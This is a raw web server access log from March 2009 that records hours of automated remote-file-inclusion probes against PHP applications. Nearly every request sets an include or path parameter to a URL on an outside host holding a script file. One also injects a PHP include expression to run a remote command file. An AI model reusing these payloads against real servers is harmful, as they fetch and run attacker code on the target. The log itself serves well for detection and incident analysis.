83.64.132.254 - - [22/Mar/2009:01:23:02 -0500] "GET /logs/?_zb_path=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 200 36689 "-""Mozilla/5.0"
58.226.23.55 - - [22/Mar/2009:01:30:28 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://gumansin.com/id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
58.226.23.55 - - [22/Mar/2009:01:30:28 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://gumansin.com/id.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
58.226.23.55 - - [22/Mar/2009:01:30:28 -0500] "GET /logs/access_log.1233100800/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://gumansin.com/id.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
58.226.23.55 - - [22/Mar/2009:01:30:47 -0500] "GET /logs/access_log.1232841600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://gumansin.com/id.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
58.226.23.55 - - [22/Mar/2009:01:31:24 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://gumansin.com/id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
58.226.23.55 - - [22/Mar/2009:01:31:24 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://gumansin.com/id.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
58.226.23.55 - - [22/Mar/2009:01:31:24 -0500] "GET /logs/access_log.1233100800/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://gumansin.com/id.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
58.226.23.55 - - [22/Mar/2009:01:31:36 -0500] "GET /logs/access_log.1232841600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://gumansin.com/id.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
82.179.197.134 - - [22/Mar/2009:01:41:14 -0500] "GET /logs/access_log.1232409600//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.sauber-leerziehen.de/styles/templates/id1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
74.52.10.106 - - [22/Mar/2009:01:54:14 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.articlecatalog.info/id.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.810"
74.52.10.106 - - [22/Mar/2009:01:54:14 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.articlecatalog.info/id.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.810"
173.10.217.18 - - [22/Mar/2009:02:04:17 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://itcdial.co.uk/adsl/config//id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
173.10.217.18 - - [22/Mar/2009:02:04:17 -0500] "GET /logs/access_log.1232150400//include/admin.lib.inc.php?site_path=http://itcdial.co.uk/adsl/config//id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
173.10.217.18 - - [22/Mar/2009:02:04:25 -0500] "GET //include/admin.lib.inc.php?site_path=http://itcdial.co.uk/adsl/config//id1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
217.16.16.223 - - [22/Mar/2009:02:07:19 -0500] "GET /logs//s_e404.inc.php?DOCUMENT_ROOT=http://geocities.com/Doankdodie/jimsid.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
217.16.16.223 - - [22/Mar/2009:02:07:19 -0500] "GET //s_e404.inc.php?DOCUMENT_ROOT=http://geocities.com/Doankdodie/jimsid.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
173.10.217.18 - - [22/Mar/2009:02:07:20 -0500] "GET /logs/access_log.1234828800//include/admin.lib.inc.php?site_path=http://itcdial.co.uk/adsl/config//id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
209.172.33.230 - - [22/Mar/2009:02:19:38 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 309 "-""libwww-perl/5.812"
209.172.33.230 - - [22/Mar/2009:02:19:38 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 314 "-""libwww-perl/5.812"
58.226.23.129 - - [22/Mar/2009:02:25:28 -0500] "GET /logs/access_log.1235260800//?sIncPath=http://gumansin.com/id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
58.226.23.129 - - [22/Mar/2009:02:25:28 -0500] "GET //?sIncPath=http://gumansin.com/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
58.226.23.129 - - [22/Mar/2009:02:25:29 -0500] "GET /logs//?sIncPath=http://gumansin.com/id.txt?? HTTP/1.1" 200 182577 "-""Mozilla/5.0"
77.232.68.137 - - [22/Mar/2009:02:29:56 -0500] "GET /logs//admin/classes/errors.php?error=http://blackincoming.freehostia.com/osy2.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
77.232.68.137 - - [22/Mar/2009:02:29:57 -0500] "GET //admin/classes/errors.php?error=http://blackincoming.freehostia.com/osy2.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
77.232.68.137 - - [22/Mar/2009:02:30:40 -0500] "GET /logs//admin/classes/errors.php?error=http://blackincoming.freehostia.com/osy2.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
77.232.68.137 - - [22/Mar/2009:02:30:40 -0500] "GET //admin/classes/errors.php?error=http://blackincoming.freehostia.com/osy2.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
58.226.23.129 - - [22/Mar/2009:02:33:41 -0500] "GET /logs/access_log.1233964800//?sIncPath=http://gumansin.com/id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
209.172.33.230 - - [22/Mar/2009:02:47:26 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cap.org.hk/phpATM/cfg/baner.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
209.172.33.230 - - [22/Mar/2009:02:47:26 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cap.org.hk/phpATM/cfg/baner.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
209.172.33.230 - - [22/Mar/2009:02:47:26 -0500] "GET /logs/access_log.1233014400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cap.org.hk/phpATM/cfg/baner.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
209.172.33.230 - - [22/Mar/2009:02:54:42 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 342 "-""libwww-perl/5.812"
209.172.33.230 - - [22/Mar/2009:02:54:42 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 337 "-""libwww-perl/5.812"
211.202.2.220 - - [22/Mar/2009:03:10:06 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://gumansin.com/id.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
211.202.2.220 - - [22/Mar/2009:03:10:06 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://gumansin.com/id.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
211.202.2.220 - - [22/Mar/2009:03:10:06 -0500] "GET /logs/access_log.1236038400/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://gumansin.com/id.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
211.202.2.220 - - [22/Mar/2009:03:10:12 -0500] "GET /logs/access_log.1235779200/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://gumansin.com/id.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
216.246.99.99 - - [22/Mar/2009:03:14:31 -0500] "GET /logs//classes/adodbt/sql.php?classes_dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
216.246.99.99 - - [22/Mar/2009:03:14:31 -0500] "GET /logs/access_log.1236038400//classes/adodbt/sql.php?classes_dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
216.246.99.99 - - [22/Mar/2009:03:14:31 -0500] "GET //classes/adodbt/sql.php?classes_dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
216.246.99.99 - - [22/Mar/2009:03:15:15 -0500] "GET /logs//classes/adodbt/sql.php?classes_dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
216.246.99.99 - - [22/Mar/2009:03:15:15 -0500] "GET //classes/adodbt/sql.php?classes_dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
216.246.99.99 - - [22/Mar/2009:03:15:15 -0500] "GET /logs/access_log.1236038400//classes/adodbt/sql.php?classes_dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
173.10.217.18 - - [22/Mar/2009:03:16:54 -0500] "GET //classes/adodbt/sql.php?classes_dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
173.10.217.18 - - [22/Mar/2009:03:16:54 -0500] "GET /logs//classes/adodbt/sql.php?classes_dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
173.10.217.18 - - [22/Mar/2009:03:16:54 -0500] "GET /logs/access_log.1236038400//classes/adodbt/sql.php?classes_dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
173.10.217.18 - - [22/Mar/2009:03:16:58 -0500] "GET /logs//classes/adodbt/sql.php?classes_dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
173.10.217.18 - - [22/Mar/2009:03:16:58 -0500] "GET //classes/adodbt/sql.php?classes_dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
173.10.217.18 - - [22/Mar/2009:03:16:58 -0500] "GET /logs/access_log.1236038400//classes/adodbt/sql.php?classes_dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
173.10.217.18 - - [22/Mar/2009:03:17:45 -0500] "GET /logs/access_log.1235952000//classes/adodbt/sql.php?classes_dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
173.10.217.18 - - [22/Mar/2009:03:17:53 -0500] "GET /logs/access_log.1235952000//classes/adodbt/sql.php?classes_dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
216.246.99.99 - - [22/Mar/2009:03:18:26 -0500] "GET /logs/access_log.1235952000//classes/adodbt/sql.php?classes_dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
87.230.21.133 - - [22/Mar/2009:03:18:35 -0500] "GET /logs/images/errors.php?error=http://www.gosstroy.com/images/kampret.jpg?? HTTP/1.1" 404 305 "-""libwww-perl/5.803"
87.230.21.133 - - [22/Mar/2009:03:18:35 -0500] "GET /images/errors.php?error=http://www.gosstroy.com/images/kampret.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
216.246.99.99 - - [22/Mar/2009:03:19:12 -0500] "GET /logs/access_log.1235952000//classes/adodbt/sql.php?classes_dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
202.60.72.43 - - [22/Mar/2009:03:21:39 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://freenet.am/~h4ck1nf0/FX29ID1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
202.60.72.43 - - [22/Mar/2009:03:21:39 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://freenet.am/~h4ck1nf0/FX29ID1.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
202.60.72.43 - - [22/Mar/2009:03:21:39 -0500] "GET /logs/access_log.1234828800//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://freenet.am/~h4ck1nf0/FX29ID1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
202.60.72.43 - - [22/Mar/2009:03:21:39 -0500] "GET /logs/access_log.1234915200//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://freenet.am/~h4ck1nf0/FX29ID1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
173.10.217.18 - - [22/Mar/2009:03:27:05 -0500] "GET //index.php?DOCUMENT_ROOT=http://drijijari.fileave.com/id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
173.10.217.18 - - [22/Mar/2009:03:27:08 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://drijijari.fileave.com/id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
173.10.217.18 - - [22/Mar/2009:03:27:08 -0500] "GET /logs/access_log.1233619200//index.php?DOCUMENT_ROOT=http://drijijari.fileave.com/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
64.118.84.7 - - [22/Mar/2009:03:27:48 -0500] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://crm.design-joomla.pl/classes/safe1.txt? HTTP/1.1" 404 324 "-""libwww-perl/5.811"
64.118.84.7 - - [22/Mar/2009:03:27:48 -0500] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://crm.design-joomla.pl/classes/safe1.txt? HTTP/1.1" 404 319 "-""libwww-perl/5.811"
64.15.159.42 - - [22/Mar/2009:03:29:32 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://offthepitch.ca/images/idd.txt???? HTTP/1.1" 404 338 "-""libwww-perl/5.812"
64.15.159.42 - - [22/Mar/2009:03:29:32 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://offthepitch.ca/images/idd.txt???? HTTP/1.1" 404 343 "-""libwww-perl/5.812"
173.10.217.18 - - [22/Mar/2009:03:31:51 -0500] "GET //index.php?DOCUMENT_ROOT=http://datacore.fileave.com/id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
173.10.217.18 - - [22/Mar/2009:03:31:51 -0500] "GET /logs/access_log.1233619200//index.php?DOCUMENT_ROOT=http://datacore.fileave.com/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
173.10.217.18 - - [22/Mar/2009:03:31:53 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://datacore.fileave.com/id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
208.76.222.178 - - [22/Mar/2009:03:34:53 -0500] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.nis-network.org/joomla/cmd.do?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
208.76.222.178 - - [22/Mar/2009:03:34:54 -0500] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.nis-network.org/joomla/cmd.do?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
69.64.34.249 - - [22/Mar/2009:03:35:40 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://imagehut.ws/img/pandegaid.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
69.64.34.249 - - [22/Mar/2009:03:35:40 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://imagehut.ws/img/pandegaid.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
69.64.34.249 - - [22/Mar/2009:03:35:40 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://imagehut.ws/img/pandegaid.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
69.64.34.249 - - [22/Mar/2009:03:35:40 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://imagehut.ws/img/pandegaid.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
69.64.34.249 - - [22/Mar/2009:03:35:41 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://imagehut.ws/img/pandegaid.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
69.64.34.249 - - [22/Mar/2009:03:35:41 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://imagehut.ws/img/pandegaid.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
69.64.34.249 - - [22/Mar/2009:03:35:41 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://imagehut.ws/img/pandegaid.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
69.64.34.249 - - [22/Mar/2009:03:35:41 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://imagehut.ws/img/pandegaid.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
81.12.13.152 - - [22/Mar/2009:03:37:14 -0500] "GET //include/bbs.lib.inc.php?site_path=http://vampires-fifa-liga.de/twomichael/admin/config/htaccess.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
81.12.13.152 - - [22/Mar/2009:03:37:14 -0500] "GET /logs/access_log.1234051200//include/bbs.lib.inc.php?site_path=http://vampires-fifa-liga.de/twomichael/admin/config/htaccess.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
81.12.13.152 - - [22/Mar/2009:03:37:14 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://vampires-fifa-liga.de/twomichael/admin/config/htaccess.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
81.12.13.152 - - [22/Mar/2009:03:37:14 -0500] "GET /logs/access_log.1235260800//include/bbs.lib.inc.php?site_path=http://vampires-fifa-liga.de/twomichael/admin/config/htaccess.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
81.12.13.152 - - [22/Mar/2009:03:37:24 -0500] "GET /logs/access_log.1233705600//include/bbs.lib.inc.php?site_path=http://vampires-fifa-liga.de/twomichael/admin/config/htaccess.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
81.12.13.152 - - [22/Mar/2009:03:37:24 -0500] "GET /logs/access_log.1232928000//include/bbs.lib.inc.php?site_path=http://vampires-fifa-liga.de/twomichael/admin/config/htaccess.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
81.12.13.152 - - [22/Mar/2009:03:37:59 -0500] "GET //include/bbs.lib.inc.php?site_path=http://vampires-fifa-liga.de/twomichael/admin/config/htaccess.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
81.12.13.152 - - [22/Mar/2009:03:37:59 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://vampires-fifa-liga.de/twomichael/admin/config/htaccess.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
81.12.13.152 - - [22/Mar/2009:03:37:59 -0500] "GET /logs/access_log.1235260800//include/bbs.lib.inc.php?site_path=http://vampires-fifa-liga.de/twomichael/admin/config/htaccess.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
81.12.13.152 - - [22/Mar/2009:03:37:59 -0500] "GET /logs/access_log.1234051200//include/bbs.lib.inc.php?site_path=http://vampires-fifa-liga.de/twomichael/admin/config/htaccess.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
81.12.13.152 - - [22/Mar/2009:03:38:06 -0500] "GET /logs/access_log.1233705600//include/bbs.lib.inc.php?site_path=http://vampires-fifa-liga.de/twomichael/admin/config/htaccess.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
81.12.13.152 - - [22/Mar/2009:03:38:06 -0500] "GET /logs/access_log.1232928000//include/bbs.lib.inc.php?site_path=http://vampires-fifa-liga.de/twomichael/admin/config/htaccess.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
87.230.21.133 - - [22/Mar/2009:03:44:10 -0500] "GET /logs/images/errors.php?error=http://www.gosstroy.com/images/kampret.jpg?? HTTP/1.1" 404 305 "-""libwww-perl/5.803"
87.230.21.133 - - [22/Mar/2009:03:44:11 -0500] "GET /images/errors.php?error=http://www.gosstroy.com/images/kampret.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
87.230.21.133 - - [22/Mar/2009:03:46:13 -0500] "GET /logs/images/errors.php?error=http://www.gosstroy.com/images/kampret.jpg?? HTTP/1.1" 404 305 "-""libwww-perl/5.803"
87.230.21.133 - - [22/Mar/2009:03:46:14 -0500] "GET /images/errors.php?error=http://www.gosstroy.com/images/kampret.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
211.202.2.220 - - [22/Mar/2009:03:47:52 -0500] "GET /logs//errors.php?error=http://gumansin.com/id.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
211.202.2.220 - - [22/Mar/2009:03:47:52 -0500] "GET //errors.php?error=http://gumansin.com/id.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
211.202.2.220 - - [22/Mar/2009:03:47:52 -0500] "GET /logs/access_log.1228608000//errors.php?error=http://gumansin.com/id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
211.202.2.220 - - [22/Mar/2009:03:48:24 -0500] "GET /logs/access_log.1229126400//errors.php?error=http://gumansin.com/id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
216.145.76.36 - - [22/Mar/2009:03:53:51 -0500] "GET /logs//admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.madolddogs.de//flash/db/id2.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.79"
216.145.76.36 - - [22/Mar/2009:03:53:51 -0500] "GET //admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.madolddogs.de//flash/db/id2.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
77.221.130.17 - - [22/Mar/2009:03:55:33 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.geocities.com/game_cakep/bjorkid.txt???%0D?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
77.221.130.17 - - [22/Mar/2009:03:55:33 -0500] "GET //include/bbs.lib.inc.php?site_path=http://www.geocities.com/game_cakep/bjorkid.txt???%0D?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
69.64.34.249 - - [22/Mar/2009:04:03:56 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
64.15.159.42 - - [22/Mar/2009:04:04:07 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://offthepitch.ca/images/idd.txt???? HTTP/1.1" 404 315 "-""libwww-perl/5.812"
64.15.159.42 - - [22/Mar/2009:04:04:07 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://offthepitch.ca/images/idd.txt???? HTTP/1.1" 404 320 "-""libwww-perl/5.812"
64.15.159.42 - - [22/Mar/2009:04:04:07 -0500] "GET /logs/access_log.1233187200//faqsupport/samplefaqsupport.php?path[docroot]=http://offthepitch.ca/images/idd.txt???? HTTP/1.1" 404 342 "-""libwww-perl/5.812"
69.64.34.249 - - [22/Mar/2009:04:04:25 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
64.118.84.7 - - [22/Mar/2009:04:04:37 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://crm.design-joomla.pl/classes/safe1.txt? HTTP/1.1" 404 335 "-""libwww-perl/5.811"
64.118.84.7 - - [22/Mar/2009:04:04:37 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://crm.design-joomla.pl/classes/safe1.txt? HTTP/1.1" 404 330 "-""libwww-perl/5.811"
64.15.159.42 - - [22/Mar/2009:04:07:36 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://offthepitch.ca/images/idd.txt???? HTTP/1.1" 404 315 "-""libwww-perl/5.812"
64.15.159.42 - - [22/Mar/2009:04:07:36 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://offthepitch.ca/images/idd.txt???? HTTP/1.1" 404 320 "-""libwww-perl/5.812"
64.15.159.42 - - [22/Mar/2009:04:07:36 -0500] "GET /logs/access_log.1233187200//faqsupport/samplefaqsupport.php?path[docroot]=http://offthepitch.ca/images/idd.txt???? HTTP/1.1" 404 342 "-""libwww-perl/5.812"
211.202.2.220 - - [22/Mar/2009:04:08:23 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
211.202.2.220 - - [22/Mar/2009:04:08:23 -0500] "GET //include/admin.lib.inc.php?site_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
211.202.2.220 - - [22/Mar/2009:04:08:23 -0500] "GET /logs/access_log.1233878400//include/admin.lib.inc.php?site_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
211.202.2.220 - - [22/Mar/2009:04:08:33 -0500] "GET /logs/access_log.1234224000//include/admin.lib.inc.php?site_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
195.225.104.227 - - [22/Mar/2009:04:10:50 -0500] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://vis1.50webs.com/v6-i.txt???? HTTP/1.1" 404 327 "-""libwww-perl/5.803"
195.225.104.227 - - [22/Mar/2009:04:10:50 -0500] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://vis1.50webs.com/v6-i.txt???? HTTP/1.1" 404 332 "-""libwww-perl/5.803"
165.194.27.141 - - [22/Mar/2009:04:14:23 -0500] "GET /logs/errors.php?error=http://www.champrond-en-gatine.org/components/errors.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
165.194.27.141 - - [22/Mar/2009:04:14:23 -0500] "GET /errors.php?error=http://www.champrond-en-gatine.org/components/errors.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
165.194.27.141 - - [22/Mar/2009:04:15:46 -0500] "GET /logs/errors.php?error=http://www.champrond-en-gatine.org/components/errors.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
165.194.27.141 - - [22/Mar/2009:04:15:47 -0500] "GET /errors.php?error=http://www.champrond-en-gatine.org/components/errors.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
165.194.27.141 - - [22/Mar/2009:04:16:01 -0500] "GET /logs/errors.php?error=http://www.champrond-en-gatine.org/components/errors.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
165.194.27.141 - - [22/Mar/2009:04:16:01 -0500] "GET /errors.php?error=http://www.champrond-en-gatine.org/components/errors.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
213.239.202.227 - - [22/Mar/2009:04:21:42 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://weko.co.kr/data/file/notice/test.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
213.239.202.227 - - [22/Mar/2009:04:21:42 -0500] "GET //include/bbs.lib.inc.php?site_path=http://weko.co.kr/data/file/notice/test.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
201.232.54.48 - - [22/Mar/2009:04:26:52 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.haesung.hs.kr//upload/fx29id2.txt???? HTTP/1.1" 404 312 "-""Mozilla/5.0"
201.232.54.48 - - [22/Mar/2009:04:26:52 -0500] "GET /logs/access_log.1233878400//include/bbs.lib.inc.php?site_path=http://www.haesung.hs.kr//upload/fx29id2.txt???? HTTP/1.1" 404 334 "-""Mozilla/5.0"
201.232.54.48 - - [22/Mar/2009:04:26:52 -0500] "GET //include/bbs.lib.inc.php?site_path=http://www.haesung.hs.kr//upload/fx29id2.txt???? HTTP/1.1" 404 307 "-""Mozilla/5.0"
201.232.54.48 - - [22/Mar/2009:04:27:03 -0500] "GET /logs/access_log.1234137600//include/bbs.lib.inc.php?site_path=http://www.haesung.hs.kr//upload/fx29id2.txt???? HTTP/1.1" 404 334 "-""Mozilla/5.0"
83.64.132.254 - - [22/Mar/2009:04:32:01 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.xgamex.org/fx29id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
